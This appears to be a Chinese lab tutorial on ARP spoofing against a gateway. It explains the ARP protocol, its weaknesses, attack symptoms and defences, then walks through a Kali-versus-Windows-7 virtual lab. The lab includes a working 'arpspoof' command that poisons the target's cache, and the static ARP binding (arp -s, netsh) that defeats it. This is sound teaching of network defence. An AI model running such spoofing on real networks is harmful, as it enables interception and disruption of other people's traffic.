网络应用实例（一）ARP攻击

ARP攻击（网关）

 

一、实验环境

二、实验原理

1.ARP协议

2.ARP缺陷

3.ARP攻击症状

4.ARP攻击形式

5.ARP攻击防御

三、ARP攻击

1.基本信息收集

2.连通性测试

3.Windows7上网测试

4.ARP攻击

5.查看攻击效果

四、ARP攻击的防御

1.Kali停止攻击，查看网关Mac地址

2.Mac地址绑定

3.执行ARP攻击

4.查看网关Mac地址

---

一、实验环境

1.攻击机：Kali Linux

2.靶  机：Windows 7

3.网卡连接：NAT（Vmnet 8）

4.IP地址：自动获取（通过Vmware软件自动分配IP地址）

二、实验原理

1.ARP协议

• Address Resolution Protocol，地址解析协议

• 位于TCP/IP协议栈中的网络层，负责将某个IP地址解析成对应MAC地址。

• 一台主机和另一台主机通信，要知道目标的IP地址，但是在局域网中传输数据的网卡却不能直接识别IP地址，所以用ARP解析协议将IP地址解析成MAC地址。ARP协议的基本功能就是通过目标设备的IP地址，来查询目标设备的mac地址

2.ARP缺陷

• ARP协议建立在信任局域网内所有节点的基础上，具有高效率，但不安全。
• 无状态的协议，不会检查自己是否发过请求包，不管是否是合法的应答，只要收到的目标MAC地址是自己的ARP reply或者ARP广播包（包括ARP reply和ARP request），都会接受并缓存。

3.ARP攻击症状

• 打开网页速度非常慢，甚至打不开
• 提示IP地址冲突
• 甚至导致校园网瘫痪断网
• 一般会绑定木马病毒，窃取用户账号密码

4.ARP攻击形式

>从内部协议分析

• 假冒ARP reply包（单波或广播），向单台主机或多台主机发送虚假的IP/MAC地址
• 假冒ARP request包（单播或广播），实际上是单播或广播虚假的IP、MAC映射
• 假冒中间人，启用包转发向两端主机发送假冒的ARP reply，由于ARP缓存的老化机制，有时还需要做周期性连续性欺骗

>从影响网络连接通畅的角度看

• 对路由ARP表的欺骗（截获网关数据，让路由器获得错误的内网MAC地址，导致路由器把数据发送给错误的MAC，使内网内的主机断网）
• 伪造内网网关（冒充网关，使内网计算机发送的数据无法到达真正的路由器网关，导致内网计算机断网）

5.ARP攻击防御

•  ARP双向绑定（在pc端上：IP+mac 绑定，在网络设备/交换路由上：采用ip+mac+端口绑定，网关也进行IP和mac的静态绑定）
• 采用支持ARP过滤的防火墙
• 建立DHCP服务器（ARP攻击一般先攻击网关，将DHCP服务器建立在网关上）
• 划分安全区域（ARP广播包是不能跨子网或网段传播的，网段可以隔离广播包。VLAN就是一个逻辑广播域，通过VLAN技术可以在局域网中创建多个子网，就在局域网中隔离了广播，缩小感染范围。）

三、ARP攻击

1.基本信息收集

Kali：    ifconfig  eth0    #查看Kali的IP
Windows7：   ipconfig  /all    #查看IP，网关
             arp -a    #查看近期局域网内与本机有过通信的其他主机
                       #查看网关对应Mac地址

• 两台主机处于同一网段：192.168.10.0/24
• Kali主机IP地址：192.168.10.128
• Windows 7 IP地址：192.168.10.130
• Windows 7 网关：192.168.10.2
• Windows 7 网关所对应的Mac地址：00-50-56-ea-e2-cd

2.连通性测试

Windows7：    关闭防火墙
Kali Linux：  ping  Windows7的IP地址

3.Windows7上网测试

打开IE浏览器 ——> 在地址栏中输入 ——> http://www.baidu.com（能看到百度页面）

4.ARP攻击

arpspoof -i eth0 -t 192.168.10.130 -r 192.168.10.2

    #arpspoof -i eth0 -t Win7的IP地址 -r 网关地址或内网中其他主机的IP地址

5.查看攻击效果

Windows7：    arp -a

• 查看网关的MAC地址是否已经变化，有变化，说明攻击成功

• 此处攻击成功

四、ARP攻击的防御

1.Kali停止攻击，查看网关Mac地址

Kali Linux：    终止ARP攻击
Windows 7：    arp -a 

• 网关MAC地址重新变回正确的地址

2.Mac地址绑定

arp -s 192.168.10.2 00-50-56-ea-e2-cd
    #arp -s 网关IP地址 网关的正确MAC地址
    #arp -s ip mac 手动修改，实现IP、MAC的绑定操作

^一般执行上述命令即可绑定成功
————————————————————————————————————————————————
>若绑定未成功，则使用以下命令

netsh i  i show in
    #查看本地连接的Idx（两个i之间有两个空格）
netsh -c "i  i" add neighbors 11 "192.168.10.2" "00-50-56-ea-e2-cd"
    #绑定Mac地址（neighbors后为本地连接的Idx）
arp -a
    #查询绑定后信息

• 此时可以看到网关的地址类型已经变成了静态

3.执行ARP攻击

arpspoof -i eth0 -t 192.168.10.130 -r 192.168.10.2

4.查看网关Mac地址

• 查看网关MAC地址是否被改变，如果未改变，说明MAC地址的静态绑定成功了